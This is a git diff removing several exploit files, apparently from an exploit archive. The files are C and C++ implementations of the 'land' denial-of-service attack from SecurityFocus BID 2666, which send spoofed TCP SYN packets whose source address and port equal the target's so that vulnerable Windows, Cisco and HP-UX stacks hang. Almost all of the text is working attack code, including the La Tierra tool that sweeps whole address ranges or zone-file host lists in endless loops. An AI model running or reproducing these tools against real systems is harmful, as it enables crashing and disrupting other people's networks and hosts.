- struct tcphdr tcp; /* and thus transmit a tiny bit faster */
- } pkt;
- struct target *next;
-} target;
-
-/** prototypes **/
-int send_land(int, struct target *);
-void u_sleep(u_int);
-int add_target_ip(char *, struct in_addr *, u_short);
-u_int get_timevar(const char *);
-int add_target(char *);
-unsigned short chksum(unsigned short *, int);
-void finish(int);
-void crash(const char *, ...);
-void usage(void);
-
-/** external **/
-extern int optind, opterr, optopt;
-extern int h_errno;
-extern char *optarg;
-extern char *__progname;
-
-/** global variables **/
-target *list = NULL, *cursor = NULL;
-int targets = 0;
-int pkt_interval = 0; /* no delay by default */
-int pkts = 1, pkts_sent = 0; /* send one per host by default */
-int debug = 0;
-u_short defport = 139; /* default port */
-
-/** code start **/
-void crash(const char *fmt, ...)
-{ - va_list ap; - - printf("%s: ", __progname); - - va_start(ap, fmt); - vprintf(fmt, ap); - va_end(ap); - - if(errno) printf(": %s", strerror(errno)); - puts(""); - - exit(3); -} - -int main(int argc, char **argv) -{ - target *host; - int sock, foo; - - if((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) - crash("socket()"); - - while((foo = getopt(argc, argv, "v:i:p:n:")) != EOF) { - switch(foo) { - case 'v': - debug++; - break; - case 'i': - pkt_interval = get_timevar(optarg); - break; - case 'p': - defport = (u_short)strtoul(optarg, NULL, 0); - break; - case 'n': - pkts = strtoul(optarg, NULL, 0); - if(debug) printf("Sending %d packets\n", pkts); - break; - default: - add_target(optarg); - break; - } - } - - argv = &argv[optind]; - while(*argv) { - add_target(*argv); - argv++; - } - - if(!targets) usage(); - - while(!pkts || pkts > pkts_sent) { - host = list; - while(host) { - printf("Sending to %s:%u ... ", - inet_ntoa(host->sa.sin_addr), - host->sa.sin_port); - foo = send_land(sock, host); - if(foo == - 1) printf("failed - %s\n", strerror(errno)); - else printf("ok, landed %d bytes\n", foo); - - if(pkt_interval) u_sleep(pkt_interval); - - host = host->next; - } - pkts_sent++; - } - - return 0; -} - -/* build and send the land attack packet */ -int send_land(int sock, struct target *host) -{ - struct raw_tcp_packet pkt; - struct tcp_chksum_hdr tcc; - - memset(&pkt, 0, sizeof(pkt)); - memset(&tcc, 0, sizeof(tcc)); - - /* ip options */ - pkt.ip.ip_v = IPVERSION; - pkt.ip.ip_hl = sizeof(struct iphdr) / 4; - pkt.ip.ip_tos = 0; - pkt.ip.ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); - pkt.ip.ip_off = htons(IP_DF); - pkt.ip.ip_ttl = 0xff; - pkt.ip.ip_p = IPPROTO_TCP; - pkt.ip.ip_src = pkt.ip.ip_dst = host->sa.sin_addr; - pkt.ip.ip_sum = chksum((u_short *)&pkt.ip, sizeof(struct iphdr)); - - tcc.src = tcc.dest = host->sa.sin_addr; - tcc.zero = 0; - tcc.proto = IPPROTO_TCP; - tcc.len = htons(sizeof(struct tcphdr)); - - tcc.tcp.th_sport = 
tcc.tcp.th_dport = htons(host->sa.sin_port); - tcc.tcp.th_seq = htons(0x1d1); - tcc.tcp.th_off = sizeof(struct ip) / 4; - tcc.tcp.th_flags = TH_SYN; - tcc.tcp.th_win = htons(512); - - memcpy(&pkt.tcp, &tcc.tcp, sizeof(struct tcphdr)); - pkt.tcp.th_sum = chksum((u_short *)&tcc, sizeof(tcc)); - return sendto(sock, &pkt, sizeof(pkt), 0, (struct sockaddr *)&host->sa, - sizeof(struct sockaddr_in)); -} - -/* calculate checksum */ -u_short chksum(u_short *p, int n) -{ - register long sum = 0; - - while(n > 1) { - sum += *p++; - n -= 2; - } - /* mop up the occasional odd byte */ - if(n == 1) sum += *(u_char *)p; - - sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ - sum = sum + (sum >> 16); /* add carry */ - return ~sum; /* ones-complement, truncate */ -} - -/* usleep() the portable way. No error checking is done, - * so this might theoretically fail. */ -void u_sleep(u_int u_sec) -{ - struct timeval to; - fd_set readset, writeset; - - if(debug > 3) printf("sleeping for %u microseconds\n", u_sec); - if(!u_sec) return; - - to.tv_sec = u_sec / 1000000; - to.tv_usec = u_sec % 1000000; - FD_ZERO(&writeset); - FD_ZERO(&readset); - select(0, &readset, &writeset, NULL, &to); - - return; -} - -int add_target_ip(char *arg, struct in_addr *in, u_short port) -{ - struct target *host; - - /* disregard obviously stupid addresses */ - if(in->s_addr == INADDR_NONE || in->s_addr == INADDR_ANY) - return -1; - - if(debug) printf("Adding %s:%u to target list\n", inet_ntoa(*in), port); - - /* add the fresh ip */ - host = malloc(sizeof(struct target)); - if(!host) { - crash("add_target_ip(%s, %s): malloc(%d) failed", - arg, inet_ntoa(*in), sizeof(struct target)); - } - memset(host, 0, sizeof(struct target)); - - /* fill out the sockaddr_in struct */ - host->sa.sin_family = AF_INET; - host->sa.sin_addr.s_addr = in->s_addr; - host->sa.sin_port = port ? 
port : defport; - - if(!list) list = host; - else cursor->next = host; - - cursor = host; - targets++; - - return 0; -} - -/* wrapper for add_target_ip to resolve stuff as well */ -int add_target(char *arg) -{ - int i; - struct hostent *he; - struct in_addr *in, ip; - char *port_str; - u_short port = 0; - - if(!arg) return -1; - - if((port_str = strchr(arg, ':'))) { - *port_str = '\0'; - port_str++; - if(*port_str) port = (u_short)strtoul(port_str, NULL, 0); - } - - /* don't resolve if we don't have to */ - if(inet_aton(arg, &ip)) return add_target_ip(arg, &ip, port); - - /* not an IP, so resolve */ - errno = 0; - he = gethostbyname(arg); - if(!he && h_errno == TRY_AGAIN) { - u_sleep(500000); - he = gethostbyname(arg); - } - - if(!he) crash("Failed to resolve %s: %s", arg, hstrerror(h_errno)); - - /* add all the IP's as targets */ - for(i = 0; he->h_addr_list[i]; i++) { - in = (struct in_addr *)he->h_addr_list[i]; - add_target_ip(arg, in, port); - } - - return 0; -} - -/* - * u = micro - * m = milli - * s = seconds - * return value is in microseconds - */ -u_int get_timevar(const char *str) -{ - char p, u, *ptr; - unsigned int len; - u_int i, d; /* integer and decimal, respectively */ - u_int factor = 1000; /* default to milliseconds */ - - if(!str) return 0; - len = strlen(str); - if(!len) return 0; - - /* unit might be given as ms|m (millisec), - * us|u (microsec) or just plain s, for seconds */ - u = p = '\0'; - u = str[len - 1]; - if(len >= 2 && !isdigit((int)str[len - 2])) p = str[len - 2]; - if(p && u == 's') u = p; - else if(!p) p = u; - if(debug > 3) printf("evaluating %s, u: %c, p: %c\n", str, u, p); - - if(u == 'u') factor = 1; /* microseconds */ - else if(u == 'm') factor = 1000; /* milliseconds */ - else if(u == 's') factor = 1000000; /* seconds */ - if(debug > 3) printf("factor is %u\n", factor); - - i = strtoul(str, &ptr, 0); - if(!ptr || *ptr != '.' 
|| strlen(ptr) < 2 || factor == 1) - return i * factor; - - /* time specified in usecs can't have decimal points, so ignore them */ - if(factor == 1) return i; - - d = strtoul(ptr + 1, NULL, 0); - - /* d is decimal, so get rid of excess baggage */ - while(d >= factor) d /= 10; - - /* the last parenthesis avoids floating point exceptions. */ - return ((i * factor) + (d * (factor / 10))); -} - -void usage(void) -{ - printf("Usage: %s -i -p -n host1:port1 hostn:portn\n\n", - __progname); - - printf("-i sets packet interval in milliseconds.\n"); - printf(" You can specify Nus for N microseconds, or Ns for N seconds.\n"); - printf(" Default is 0, which is good for multiple hosts and one packet.\n"); - printf(" If you want to send continuously, specify 1s or more, so as to not\n"); - printf(" cause DoS due to sheer traffic volume.\n\n"); - printf("-p sets the DEFAULT port (139 if not specified)\n\n"); - printf("-n determines how many packets to send to each target. Default is 1\n\n"); - printf("host:port combinations can be given as such; 207.46.130.108:80\n"); - printf("The port part of a target definition ovverrides the defaults.\n\n"); - printf("Hostnames will be resolved, if possible.\n"); - - exit(1); -} diff --git a/platforms/multiple/remote/20811.cpp b/platforms/multiple/remote/20811.cpp deleted file mode 100755 index 1096814bb..000000000 --- a/platforms/multiple/remote/20811.cpp +++ /dev/null 
@@ -1,247 +0,0 @@
-source: http://www.securityfocus.com/bid/2666/info
-
-A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
-
-It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
-
-**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
-
-//
-// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} fe80::2a1:b0ff:fe08:8bcc 135
-//
-// Written by: Konrad Malewski.
-// - -#include -#include -#include -#include -#include -#include -/////////////////////////////////////////////////////////////////////////////// -///////////// from libnet ///////////// -/* ethernet addresses are 6 octets long */ -#define ETHER_ADDR_LEN 0x6 - -typedef unsigned char u_int8_t; -typedef unsigned short u_int16_t; -typedef unsigned int u_int32_t; -typedef unsigned __int64 u_int64_t; -/* -* Ethernet II header -* Static header size: 14 bytes -*/ -struct libnet_ethernet_hdr -{ - u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */ - u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */ - u_int16_t ether_type; /* protocol */ -}; - -struct libnet_in6_addr -{ - union - { - u_int8_t __u6_addr8[16]; - u_int16_t __u6_addr16[8]; - u_int32_t __u6_addr32[4]; - } __u6_addr; /* 128-bit IP6 address */ -}; - - -/* -* IPv6 header -* Internet Protocol, version 6 -* Static header size: 40 bytes -*/ -struct libnet_ipv6_hdr -{ - u_int8_t ip_flags[4]; /* version, traffic class, flow label */ - u_int16_t ip_len; /* total length */ - u_int8_t ip_nh; /* next header */ - u_int8_t ip_hl; /* hop limit */ - struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */ - -}; - -/* -* TCP header -* Transmission Control Protocol -* Static header size: 20 bytes -*/ -struct libnet_tcp_hdr -{ - u_int16_t th_sport; /* source port */ - u_int16_t th_dport; /* destination port */ - u_int32_t th_seq; /* sequence number */ - u_int32_t th_ack; /* acknowledgement number */ - u_int8_t th_x2:4, /* (unused) */ -th_off:4; /* data offset */ - - u_int8_t th_flags; /* control flags */ - u_int16_t th_win; /* window */ - u_int16_t th_sum; /* checksum */ - u_int16_t th_urp; /* urgent pointer */ -}; - -int libnet_in_cksum(u_int16_t *addr, int len) -{ - int sum; - union - { - u_int16_t s; - u_int8_t b[2]; - }pad; - sum = 0; - while (len > 1) - { - sum += *addr++; - len -= 2; - } - if (len == 1) - { - pad.b[0] = *(u_int8_t *)addr; - pad.b[1] = 0; - sum += pad.s; - } - 
return (sum); -} -#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff)) - -/////////////////////////////////////////////////////////////////////////////// -/////////////////////////////////////////////////////////////////////////////// -u_char packet[74]; -struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14); -struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54); -struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet; - -u_char errbuf[1024]; -pcap_t *pcap_handle; - - -void usage(char* n) -{ - pcap_if_t * alldevs,*d; - int i=1; - fprintf(stdout,"Usage:\n" - "\t %s \n",n); - - if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1) - { - fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf); - exit(EXIT_FAILURE); - } - printf("Avaliable adapters: \n"); - d = alldevs; - while (d!=NULL) - { - printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description); - d = d->next; - } - pcap_freealldevs (alldevs); -} -/////////////////////////////////////////////////////////////////////////////// -int main(int argc, char* argv[]) -{ - if ( argc<4 ) - { - usage(argv[0]); - return EXIT_FAILURE; - } - - int retVal; - struct addrinfo hints,*addrinfo; - - ZeroMemory(&hints,sizeof(hints)); - - WSADATA wsaData; - if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR ) - { - fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError()); - return EXIT_FAILURE; - } - // - // Get MAC address of remote host (assume link local IpV6 address) - // - - hints.ai_family = PF_INET6; - hints.ai_socktype = SOCK_STREAM; - hints.ai_protocol = IPPROTO_TCP; - hints.ai_flags = AI_PASSIVE; - - retVal = getaddrinfo(argv[2],0, &hints, &addrinfo); - if ( retVal!=0 ) - { - WSACleanup(); - fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError()); - exit(EXIT_FAILURE); - } - - // - // Open WinPCap adapter - // - if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 100, (char*)errbuf)) == NULL ) - { 
- freeaddrinfo(addrinfo); - WSACleanup(); - fprintf(stderr, "Error opening device: %s\n",argv[1]); - return EXIT_FAILURE; - } - - ZeroMemory(packet,sizeof(packet)); - struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr; - - // fill ethernet header - eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 00:something; - eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9]; - eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10]; - eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13]; - eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14]; - eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15]; - eth_hdr->ether_type = 0xdd86; - - - // fill IP header - // source ip == destination ip - memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte)); - memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte)); - ip6_hdr->ip_hl = 255; - ip6_hdr->ip_nh = IPPROTO_TCP; - ip6_hdr->ip_len = htons (20); - ip6_hdr->ip_flags[0] = 0x06 << 4; - srand((unsigned int) time(0)); - // fill tcp header - tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source port equal to destination - tcp_hdr->th_seq = rand(); - tcp_hdr->th_ack = rand(); - tcp_hdr->th_off = htons(5); - tcp_hdr->th_win = rand(); - tcp_hdr->th_sum = 0; - tcp_hdr->th_urp = htons(10); - tcp_hdr->th_off = 5; - tcp_hdr->th_flags = 2; - // calculate tcp checksum - int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32); - chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr)); - chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct libnet_tcp_hdr)); - tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum); - // send data to wire - retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet)); - if ( retVal == -1 ) - { - fprintf(stderr,"Error writing packet to 
wire!!\n"); - } - // - // close adapter, free mem.. etc.. - // - pcap_close(pcap_handle); - freeaddrinfo(addrinfo); - WSACleanup(); - return EXIT_SUCCESS; -} - --- -NTBugtraq Editor's Note: - -Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered. --- diff --git a/platforms/multiple/remote/20813.c b/platforms/multiple/remote/20813.c deleted file mode 100755 index 8d23332d3..000000000 --- a/platforms/multiple/remote/20813.c +++ /dev/null 
@@ -1,852 +0,0 @@ -source: http://www.securityfocus.com/bid/2666/info - -A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. - -It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. - -**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. 
- -/**************************************************************/ -/* */ -/* La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net */ -/* */ -/* Modified version of land.c by m3lt, FLC */ -/* */ -/* Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz */ -/* gcc version 2.7.2.1 tabs set to 3 */ -/* */ -/* gcc latierra.c -o latierra */ -/* */ -/* Refer to readme.txt for more details and history */ -/* */ -/**************************************************************/ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define DEFAULT_FREQUENCY 1 -#define TRUE 1 -#define FALSE 0 -#define FOR_EVER -5 -#define LIST_FILE 1 -#define ZONE_FILE 2 -#define MAXLINELENGTH 512 -#define DEFAULT_SEQ 0xF1C -#define DEFAULT_TTL 0xFF -#define DEFAULT_TCPFLAGS (TH_SYN | TH_PUSH) -#define DEFAULT_WINSIZE 0xFDE8 - -struct pseudohdr - { - struct in_addr saddr; - struct in_addr daddr; - u_char zero; - u_char protocol; - u_short length; - struct tcphdr tcpheader; - }; - -typedef struct latierra_data - { - char dest_ip[256]; - int tcp_flags; - int window_size; - int ip_protocol; - int sequence_number; - int ttl; - int supress_output; - int message_type; - } LATIERRA_DATA; - -void alternatives(void); -int get_ip(int use_file, FILE *fp, char *buff); -int land(LATIERRA_DATA *ld, int port_number); -void nslookup_help(void); -void print_arguments(void); -void protocol_list(void); - -/********/ -/* main */ -/********/ -int main(int argc, char **argv) -{ - FILE *fp; - LATIERRA_DATA ld; - int frequency = DEFAULT_FREQUENCY, x; - int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE; - int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE; - char got_ip = FALSE, got_beg_port = FALSE; - char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16]; - - printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n"); - printf("Enhanced version of land.c originally developed by m3lt, FLC\n"); - - 
strcpy(valid_tcp_flags, "fsrpau"); - ld.tcp_flags = 0; - ld.window_size = DEFAULT_WINSIZE; - ld.ip_protocol = IP_TCP; - ld.sequence_number = DEFAULT_SEQ; - ld.ttl = DEFAULT_TTL; - ld.message_type = 0; - - if(argc > 1 && (!strcmp(argv[1], "-a"))) - alternatives(); - - if(argc > 1 && (!strcmp(argv[1], "-n"))) - nslookup_help(); - - if(argc > 1 && (!strcmp(argv[1], "-p"))) - protocol_list(); - - if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h")))) - print_arguments(); - - while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF) - { - switch(i) - { - case 't': - for(x=0;x 1) - strcpy(ld.dest_ip, optarg); - else - { - printf("ERROR: Must specify valid IP or hostname.\n"); - return(-6); - } - got_ip = TRUE; - break; - case 's': - frequency = atoi(optarg); - break; - case 'l': - loop = atoi(optarg); - break; - case 'b': - beginning_port = atoi(optarg); - got_beg_port = TRUE; - break; - case 'e': - ending_port = atoi(optarg); - break; - } - } - - if(!ld.tcp_flags) - ld.tcp_flags = DEFAULT_TCPFLAGS; - - if(!got_beg_port) - { - fprintf(stderr, "\nMust specify beginning port number. Use -h for help with arguments.\n\n"); - return(-7); - } - - if(ending_port == 0) - ending_port = beginning_port; - - printf("\nSettings:\n\n"); - - printf(" (-i) Dest. 
IP Addr : "); - - if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-') - { - ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0; - strcpy(class_c_addr, ld.dest_ip); - strcat(ld.dest_ip, "1"); - printf(" %s (Class C range specified).\n", ld.dest_ip); - increment_addr = TRUE; - octet = 1; - } - else - if(strlen(ld.dest_ip) > 5) - { - if(strncmp(ld.dest_ip, "zone=", 5)==0) - { - strcpy(filename, &ld.dest_ip[5]); - printf("%s (using DNS zone file)\n", filename); - use_file = ZONE_FILE; - } - else if(strncmp(ld.dest_ip, "list=", 5) == 0) - { - strcpy(filename, &ld.dest_ip[5]); - printf("%s (using ASCII list)\n", filename); - use_file = LIST_FILE; - } - else - printf("%s\n", ld.dest_ip); - } - else - { - printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip); - return(-9); - } - - printf(" (-b) Beginning Port #: %d\n", beginning_port ); - printf(" (-e) Ending Port # : %d\n", ending_port ); - printf(" (-s) Seconds to Pause: %d\n", frequency ); - printf(" (-l) Loop : %d %s\n", loop, (loop == FOR_EVER) ? 
"(forever)" : " " ); - printf(" (-w) Window size : %d\n", ld.window_size ); - printf(" (-q) Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number ); - printf(" (-v) Time-to-Live : %d\n", ld.ttl); - printf(" (-p) IP Protocol # : %d\n", ld.ip_protocol ); - printf(" (-t) TCP flags : "); - - strcpy(buff, ""); - - if( ld.tcp_flags & TH_FIN) - strcat(buff, "fin "); - if( ld.tcp_flags & TH_SYN) - strcat(buff, "syn "); - if(ld.tcp_flags & TH_RST) - strcat(buff, "rst "); - if(ld.tcp_flags & TH_PUSH) - strcat(buff, "push "); - if(ld.tcp_flags & TH_ACK) - strcat(buff, "ack "); - if(ld.tcp_flags & TH_URG) - strcat(buff, "urg "); - - printf("%s\n\n", buff); - - if(ending_port < beginning_port) - { - printf("\nERROR: Ending port # must be greater than beginning port #\n\n"); - return(-8); - } - - scan_loop = loop_val = loop; - - if(use_file) - { - if(access(filename, 0)) - { - printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename); - return(-9); - } - - if( (fp = fopen(filename, "rt")) == NULL) - { - printf("ERROR: Unable to open %s.\n", filename); - return(-10); - } - - if(!get_ip(use_file, fp, buff)) - { - printf("Unable to get any IP address from file %s.\n"); - return(-11); - } - - strcpy(ld.dest_ip, buff); - } - - while( (loop == FOR_EVER) ? 1 : loop-- > 0) - { - for(i=beginning_port; i <= ending_port; i++) - { - if(land(&ld, i)) /* go for it BaBy! */ - break; - - if(frequency) /* make sure freq > 0 */ - { - if(!ld.supress_output) - printf("-> paused %d seconds.\n", frequency); - sleep(frequency); - } - } - - if( (!use_file) && (loop && increment_addr) ) - { - char temp_addr[21]; - - if(++octet > 254) /* check for reset */ - { - if(loop_val != FOR_EVER) /* make sure not to distrute forever! 
*/ - { - if(++scan_loop > loop_val) /* check if scanned x times */ - break; - else - loop = loop_val; /* restore original value */ - } - octet = 1; /* reset */ - } - - sprintf(temp_addr, "%s%d", class_c_addr, octet); - strcpy(ld.dest_ip, temp_addr); - - if(!ld.supress_output) - printf("** incrementing to next IP address: %s\n", ld.dest_ip); - - if(scan_loop > loop_val) - break; /* break while loop */ - } - else if(use_file) - { - if(!get_ip(use_file, fp, buff)) - break; - - loop++; - - strcpy(ld.dest_ip, buff); - } - - } /* end while */ - - printf("\nDone.\n\n"); -} /* end main */ - -int get_ip(int use_file, FILE *fp, char *buff) -{ - if(use_file == LIST_FILE) - return(get_ip_from_list(fp, buff)); - - return(get_ip_from_zone(fp, buff)); -} - -int get_ip_from_list(FILE *fp, char *buff) -{ - int ret_val; - - while(1) - { - ret_val = (int)fgets(buff, MAXLINELENGTH, fp); - - if((ret_val == EOF) || (ret_val == (int)NULL)) - return 0; - - if( strlen(buff) >= 7) - if((buff[0] != ';') && (buff[0] != '[')) - { - if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') ) - buff[strlen(buff)-1] = 0x0; - - return 1; - } - } - - return 0; -} - -int get_ip_from_zone(FILE *fp, char *buff) -{ - int ret_val, i; - char *p, delim[8]; - - strcpy(delim, " \t"); - - while(1) - { - ret_val = (int)fgets(buff, MAXLINELENGTH, fp); - - if((ret_val == EOF) || (ret_val == (int)NULL)) - return 0; - - if( strlen(buff) >= 7) - if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0)) - { - if( (p = strtok( buff, delim)) == NULL) - continue; - - if( (p = strtok(NULL, delim)) == NULL) - continue; - - if(strcmp(p, "A")) /* be sure second column is an DNS A record */ - continue; - - if( (p = strtok(NULL, delim)) == NULL) - continue; - - strcpy(buff, p); - - /* verify that we have a valid IP address to work with */ - - if(inet_addr(p) == -1) - continue; - - /* strip off training line characters */ - - if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') ) 
- buff[strlen(buff)-1] = 0x0; - - return 1; - } - } - - return 0; -} - -/************/ -/* checksum */ -/************/ -u_short checksum(u_short * data,u_short length) -{ - register long value; - u_short i; - - for(i = 0; i< (length >> 1); i++) - value += data[i]; - - if((length & 1)==1) - value += (data[i] << 8); - - value = (value & 0xFFFF) + (value >> 16); - - return(~value); -} - -/********/ -/* land */ -/********/ -int land(LATIERRA_DATA *ld, int port_number) -{ - struct sockaddr_in sin; - int sock; - char buffer[40]; - struct iphdr * ipheader = (struct iphdr *) buffer; - struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); - struct pseudohdr pseudoheader; - - bzero(&sin,sizeof(struct sockaddr_in)); - - sin.sin_family=AF_INET; - - if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1) - { - printf("ERROR: unknown host %s\n", ld->dest_ip); - return(-1); - } - - if((sin.sin_port=htons(port_number))==0) - { - printf("ERROR: unknown port %s\n",port_number); - return(-2); - } - - if((sock=socket(AF_INET,SOCK_RAW,255))==-1) - { - printf("ERROR: couldn't allocate raw socket\n"); - return(-3); - } - - bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); - - ipheader->version=4; - ipheader->ihl=sizeof(struct iphdr)/4; - ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); - ipheader->id=htons(ld->sequence_number); - ipheader->ttl = ld->ttl; - ipheader->protocol = ld->ip_protocol; - ipheader->saddr=sin.sin_addr.s_addr; - ipheader->daddr=sin.sin_addr.s_addr; - - tcpheader->th_sport = sin.sin_port; - tcpheader->th_dport = sin.sin_port; - tcpheader->th_seq = htonl(ld->sequence_number); - tcpheader->th_flags = ld->tcp_flags; - tcpheader->th_off = sizeof(struct tcphdr)/4; - tcpheader->th_win = htons(ld->window_size); - - bzero(&pseudoheader,12+sizeof(struct tcphdr)); - - pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; - pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; - pseudoheader.protocol = ld->ip_protocol; - pseudoheader.length = 
htons(sizeof(struct tcphdr)); - bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); - tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); - - if( sendto(sock, buffer, - sizeof(struct iphdr)+sizeof(struct tcphdr), - ld->message_type, - (struct sockaddr *) &sin, - sizeof(struct sockaddr_in) )==-1) - { - printf("ERROR: can't send packet. (sendto failed)\n"); - return(-4); - } - - if(!ld->supress_output) - printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number); - - close(sock); - - return(0); -} -/* End of land */ - -void alternatives() -{ - printf("\nAlternative command line arguments for option -i\n\n"); - - printf(" You can create two types of files that latierra can use to get\n"); - printf(" a list of IP addresses, a simple ASCII file with each IP address\n"); - printf(" appearing on each line or better yet, a DNS zone file created by\n"); - printf(" nslookup. If you are unfamiliar with nslookup, specify a '-n' on the\n"); - printf(" command line of latierra.\n\n"); - printf(" Basically, latierra will walk down the list and send the spoofed packet\n"); - printf(" to each IP address. Once the list is complete, and loop > 1, the list\n"); - printf(" is repeated. To specify that the '-i' option should use a zone file,\n"); - printf(" specify \"zone=filename.txt\" instead of an IP address. To specify a \n"); - printf(" simple ASCII list of IP addresses, use \"list=filename.txt\". Lines\n"); - printf(" beginning with ';' or '[' are ignored. 
Lines that are not an 'A' \n"); - printf(" record (second column)in a zone file will ignored.\n\n"); - - exit(-1); -} - -void nslookup_help() -{ - printf("\nNSLOOKUP help\n\n"); - - - printf("To see who is the DNS server for a particular domain, issue the following:\n"); - printf(" > set type=ns\n"); - printf(" > xyz.com\n\n"); - printf(" You will see a list of the name server(s) if completed successfully\n\n"); - - printf("To get a list of all the DNS entries for a particular domain, run nslookup\n"); - printf("and issue the following commands:\n"); - printf(" > server 1.1.1.1\n"); - printf(" > ls -d xyz.com > filename.txt\n\n"); - - printf("Line 1 sets the server that nslookup will use to resolve a name.\n"); - printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n"); - - exit(-1); -} - -void protocol_list() -{ - printf("\nProtocol List:\n\n"); - printf("Verified:\n"); - printf("1-ICMP 2-IGMP 3-GGP 5-ST 6-TCP 7-UCL 8-EGP 9-IGP 10-BBN_RCC_MON\n"); - printf("11-NVP11 13-ARGUS 14-EMCON 15-XNET 16-CHAOS 17-UDP 18-MUX\n"); - printf("19-DCN_MEAS 20-HMP 21-PRM 22-XNS_IDP 23-TRUNK1 24-TRUNK2\n"); - printf("25-LEAF1 26-LEAF2 27-RDP 28-IRTP 29-ISO_TP4 30-NETBLT\n"); - printf("31-MFE_NSP 32-MERIT_INP 33-SEP 34-3PC 62-CFTP 64-SAT_EXPAK\n"); - printf("66-RVD 67-IPPC 69-SAT_MON 70-VISA 71-IPCV\n"); - 